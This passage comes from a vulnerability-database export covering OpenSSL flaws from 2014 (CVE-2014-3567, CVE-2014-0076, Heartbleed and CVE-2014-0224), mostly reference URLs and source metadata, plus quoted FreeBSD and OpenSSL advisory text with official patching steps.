}, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141477196830952\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61130" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61073" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62070" }, { "trust": 1.1, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1031052" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html" }, { "trust": 1.1, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-015.txt.asc" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61207" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62030" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61819" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61058" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61990" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61837" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62124" }, { "trust": 1.1, "url": "http://support.apple.com/ht204244" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/jan/msg00003.html" }, { "trust": 1.1, "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142103967620673\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0126.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142624590206005\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142791032306609\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142834685803386\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142804214608580\u0026w=2" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10091" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61959" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61298" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59627" }, { "trust": 1.1, "url": "http://advisories.mageia.org/mgasa-2014-0416.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143290437727362\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143290583027876\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143290522027658\u0026w=2" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00002.html" }, { "trust": 1.1, "url": "https://support.apple.com/ht205217" }, { "trust": 1.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=7fd4ce6a997be5f5c9e744ac527725c2850de203" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.8, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.8, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.8, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.4, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.4, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21687676" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "https://bto.bluecoat.com/security-advisory/sa87" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21690537" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959161" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691210" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/may/158" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/may/156" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/may/157" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574073" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/may/159" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/151" }, { "trust": 0.3, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:23.openssl.asc" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04492722" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04540692" }, { "trust": 0.3, "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04561445" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04616259" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/apr/35" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04624296" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04533567 " }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04533567 " }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686792" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098196" }, { "trust": 0.3, "url": "https://support.asperasoft.com/entries/103000206-security-advisory-cve-2014-3513-cve-2014-3566-poodle-cve-2014-3567-cve-2014-3568" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097074" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21884030" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959134" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21688284" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697995" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697165" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687801" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21689482" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097375" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689101" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700275" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098265" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021548" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097587" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701452" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098251" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098105" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21693662" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689347" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097159" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097913" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21697162" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097867" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097911" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097807" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098586" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689743" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020593" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21691140" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2015-0001.html " }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101009000" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699200" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700489" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687863" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=ssg1s1005003" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-3567" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3567" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3566" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/399.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:0126" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2385-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=37192" }, { "trust": 0.1, "url": "http://www.hp.com/go/oa" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0195" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150319.txt" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150108.txt" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0221" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0076" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.7" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.22" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "http://h18013.www1.hp.com/products/servers/management/hpsim/download.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0248" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5910" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://developer.apple.com/xcode/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6394" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0251" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5909" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3513" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/1232123" }, { "trust": 0.1, "url": "https://www.openssl.org/~bodo/ssl-poodle.pdf" }, { "trust": 0.1, "url": "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00" }, { "trust": 0.1, "url": "https://www.openssl.org/about/secpolicy.html" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3567" }, { "db": "BID", "id": "70586" }, { "db": "PACKETSTORM", "id": "131306" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "128838" }, { "db": "PACKETSTORM", "id": "131273" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "132085" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "128708" }, { "db": "PACKETSTORM", "id": "128921" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "133617" }, { "db": "PACKETSTORM", "id": "132080" }, { "db": "PACKETSTORM", "id": "128728" }, { "db": "PACKETSTORM", "id": "128793" }, { "db": "PACKETSTORM", "id": "169664" }, { "db": "CNNVD", "id": "CNNVD-201410-636" }, { "db": "NVD", "id": "CVE-2014-3567" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3567" }, { "db": "BID", "id": "70586" }, { "db": "PACKETSTORM", "id": "131306" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "128838" }, { "db": "PACKETSTORM", "id": "131273" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "132085" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "128708" }, { "db": "PACKETSTORM", "id": "128921" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "133617" }, { "db": "PACKETSTORM", "id": "132080" }, { "db": "PACKETSTORM", "id": "128728" }, { "db": "PACKETSTORM", "id": "128793" }, { "db": "PACKETSTORM", "id": "169664" }, { "db": "CNNVD", "id": "CNNVD-201410-636" }, { "db": "NVD", "id": "CVE-2014-3567" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-10-19T00:00:00", "db": "VULMON", "id": "CVE-2014-3567" }, { "date": "2014-10-15T00:00:00", "db": "BID", "id": "70586" }, { "date": "2015-04-06T19:11:05", "db": "PACKETSTORM", "id": "131306" }, { "date": "2015-03-13T17:11:00", "db": "PACKETSTORM", "id": "130815" }, { "date": "2014-10-24T20:07:16", "db": "PACKETSTORM", "id": "128838" }, { "date": "2015-04-03T15:45:16", "db": "PACKETSTORM", "id": "131273" }, { "date": "2015-03-25T00:42:25", "db": "PACKETSTORM", "id": "131014" }, { "date": "2015-05-29T23:37:43", "db": "PACKETSTORM", "id": "132085" }, { "date": "2015-03-27T20:42:44", "db": "PACKETSTORM", "id": "131044" }, { "date": "2014-10-17T00:03:35", "db": "PACKETSTORM", "id": "128708" }, { "date": "2014-10-31T23:08:29", "db": "PACKETSTORM", "id": "128921" }, { "date": "2015-05-29T23:37:11", "db": "PACKETSTORM", "id": "132081" }, { "date": "2015-09-19T15:31:48", "db": "PACKETSTORM", "id": "133617" }, { "date": "2015-05-29T23:37:04", "db": "PACKETSTORM", "id": "132080" }, { "date": "2014-10-17T14:50:20", "db": "PACKETSTORM", "id": "128728" }, { "date": "2014-10-22T18:52:41", "db": "PACKETSTORM", "id": "128793" }, { "date": "2014-10-15T12:12:12", "db": "PACKETSTORM", "id": "169664" }, { "date": "2014-10-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201410-636" }, { "date": "2014-10-19T01:55:13.933000", "db": "NVD", "id": "CVE-2014-3567" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2014-3567" }, { "date": "2016-09-09T15:00:00", "db": "BID", "id": "70586" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201410-636" }, { "date": "2023-11-07T02:20:13.200000", "db": "NVD", "id": "CVE-2014-3567" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "128708" }, { "db": "CNNVD", "id": "CNNVD-201410-636" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Memory leak denial of service vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201410-636" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201410-636" } ], "trust": 0.6 } }
var-201403-0514
Vulnerability from variot
The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack. OpenSSL is prone to an information-disclosure weakness. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
============================================================================= FreeBSD-SA-14:06.openssl Security Advisory The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib Module: openssl Announced: 2014-04-08 Affects: All supported versions of FreeBSD. Corrected: 2014-04-08 18:27:39 UTC (stable/10, 10.0-STABLE) 2014-04-08 18:27:46 UTC (releng/10.0, 10.0-RELEASE-p1) 2014-04-08 23:16:19 UTC (stable/9, 9.2-STABLE) 2014-04-08 23:16:05 UTC (releng/9.2, 9.2-RELEASE-p4) 2014-04-08 23:16:05 UTC (releng/9.1, 9.1-RELEASE-p11) 2014-04-08 23:16:19 UTC (stable/8, 8.4-STABLE) 2014-04-08 23:16:05 UTC (releng/8.4, 8.4-RELEASE-p8) 2014-04-08 23:16:05 UTC (releng/8.3, 8.3-RELEASE-p15) CVE Name: CVE-2014-0076, CVE-2014-0160
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
- Revision History
v1.0 2014-04-08 Initial release. v1.1 2014-04-08 Added patch applying step in Solutions section.
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.
The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation and a basis for path MTU (PMTU) discovery for DTLS.
Elliptic Curve Digital Signature Algorithm (ECDSA) is a variant of the Digital Signature Algorithm (DSA) which uses Elliptic Curve Cryptography. OpenSSL uses the Montgomery Ladder Approach to compute scalar multiplication in a fixed amount of time, which does not leak any information through timing or power.
II. Problem Description
The code used to handle the Heartbeat Extension does not do sufficient boundary checks on record length, which allows reading beyond the actual payload. [CVE-2014-0160]. Affects FreeBSD 10.0 only.
A flaw in the implementation of Montgomery Ladder Approach would create a side-channel that leaks sensitive timing information. [CVE-2014-0076]
III. Impact
An attacker who can send a specifically crafted packet to TLS server or client with an established connection can reveal up to 64k of memory of the remote system. Such memory might contain sensitive information, including key material, protected content, etc. which could be directly useful, or might be leveraged to obtain elevated privileges. [CVE-2014-0160]
A local attacker might be able to snoop a signing process and might recover the signing key from it. [CVE-2014-0076]
IV. Workaround
No workaround is available, but systems that do not use OpenSSL to implement the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols implementation and do not use the ECDSA implementation from OpenSSL are not vulnerable.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 8.x and FreeBSD 9.x]
fetch http://security.FreeBSD.org/patches/SA-14:06/openssl.patch
fetch http://security.FreeBSD.org/patches/SA-14:06/openssl.patch.asc
gpg --verify openssl.patch.asc
[FreeBSD 10.0]
fetch http://security.FreeBSD.org/patches/SA-14:06/openssl-10.patch
fetch http://security.FreeBSD.org/patches/SA-14:06/openssl-10.patch.asc
gpg --verify openssl-10.patch.asc
b) Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
3) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
IMPORTANT: the update procedure above does not update OpenSSL from the Ports Collection or from a package, known as security/openssl, which has to be updated separately via ports or package.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r264285 releng/8.3/ r264284 releng/8.4/ r264284 stable/9/ r264285 releng/9.1/ r264284 releng/9.2/ r264284 stable/10/ r264266 releng/10.0/ r264267
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. References
The latest revision of this advisory is available at
iQIcBAEBCgAGBQJTRJySAAoJEO1n7NZdz2rnzPcQALd6So7vDRBaYiaGwQjc55oI QwTnNzkkgxVTGwi8lDV6h8bIW3Ga8AhMGoZCVOeKbDABBDghVYe6Na5e/wsHbPPu tXmDRhoi2aV0sVCTFfpoCNJ8l2lb+5vnmEC6Oi3PMQDbRC+Ptg15o0W/2hXw0eKO yu4BhS4dl6lX7IvlR1n4sr0rfa8vwxe5OpUUd6Bzw0SUBmV+BTzq1C70FuOZ/hnD ThaZS8Ox3fcWuPylhPbhxnWqg0oVNkBpiRYpIBadrpl9EiRRzbTfF+uFvauR9tBN 1mK8lLwd7DK6x8iCSnDd2ZlN1rNn8EPsGohT4vP+szz2E2YP1x8ugihEBdYax+Dh Z4TWkm3/wJwEf00G32E1hZ8F+UavE8AmnGVk6gxiRpnv2sdNJYRlWd9O8u251qMq uzcmBX6Jr14dQCwlqof8pYKYV7VCE/Cu4JHThOCL042CLwUmXyJVMFzm6WPQlNjC dlPbSG+PXjninPjcYBoMR+863X35Guv0pJBNG/ofEh+Jy5MveaMRQX/mA+wy29zm qg74lM07adXkJujPAuA5dYjZivpW1NPOHeIjaYjaI6KDw2q3BlkGa2C3PeYDQxn4 Iqujqpem5nyQY4BO2XC8gVtuym0jDSA98bgFXumNDkmzlUUuOFOWD8YScLopOzOu EpUXgezogk1Rd3EVsaJ+ =UBO0 -----END PGP SIGNATURE----- . OpenSSL Security Advisory [05 Jun 2014] ========================================
SSL/TLS MITM vulnerability (CVE-2014-0224)
An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers. This can be exploited by a Man-in-the-middle (MITM) attack where the attacker can decrypt and modify traffic from the attacked client and server.
